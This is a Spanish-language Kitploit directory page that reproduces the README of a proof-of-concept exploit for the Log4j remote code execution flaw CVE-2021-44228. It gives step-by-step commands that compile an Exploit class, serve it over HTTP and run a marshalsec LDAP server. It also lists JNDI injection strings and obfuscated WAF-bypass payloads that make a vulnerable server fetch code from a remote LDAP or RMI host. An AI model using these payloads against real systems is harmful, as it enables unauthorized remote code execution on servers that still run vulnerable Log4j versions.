Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4J_0day_RCE — Log4j-RCE (CVE-2021-44228) Prueba de Concepto | Kitploit
Herramientas/GitHubGitHub/wysiiwyg/log4j_0day_rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de Penetración
GitHubwysiiwyg/log4j_0day_rce

Log4J_0day_RCE

Log4j-RCE (CVE-2021-44228) Prueba de Concepto

Ver Repositorio
112hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Únete a la Comunidad

Telegram

CVE-2021-44228 (Ejecución Remota de Código en Apache Log4j)

Versiones afectadas < 2.15.0

Uso:

git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
python -m SimpleHTTPServer 8888 
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Finalmente ejecuta el proyecto, verás la calculadora de tu sistema local.

Consejos:

puedes usar JNDI-Injection-Exploit para explotar.

Bypass rc1

Por ejemplo:

${jndi:ldap://127.0.0.1:1389/ badClassName}

Bypass WAF

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

Detalles de la Vulnerabilidad

Las búsquedas (lookups) proporcionan una forma de agregar valores a la configuración de Log4j en lugares arbitrarios.

Lookups

Los métodos que provocan la fuga finalmente

LogManager.getLogger().error()
LogManager.getLogger().fatal()

Método Simple de Verificación

Si deseas realizar pruebas de caja negra, te sugiero hacer escaneo pasivo.

BurpLog4jScan

¡Diviértete!!! BurpLog4jScan.png

Evolución de estrellas a lo largo del tiempo

Stargazers over time

Descargar herramienta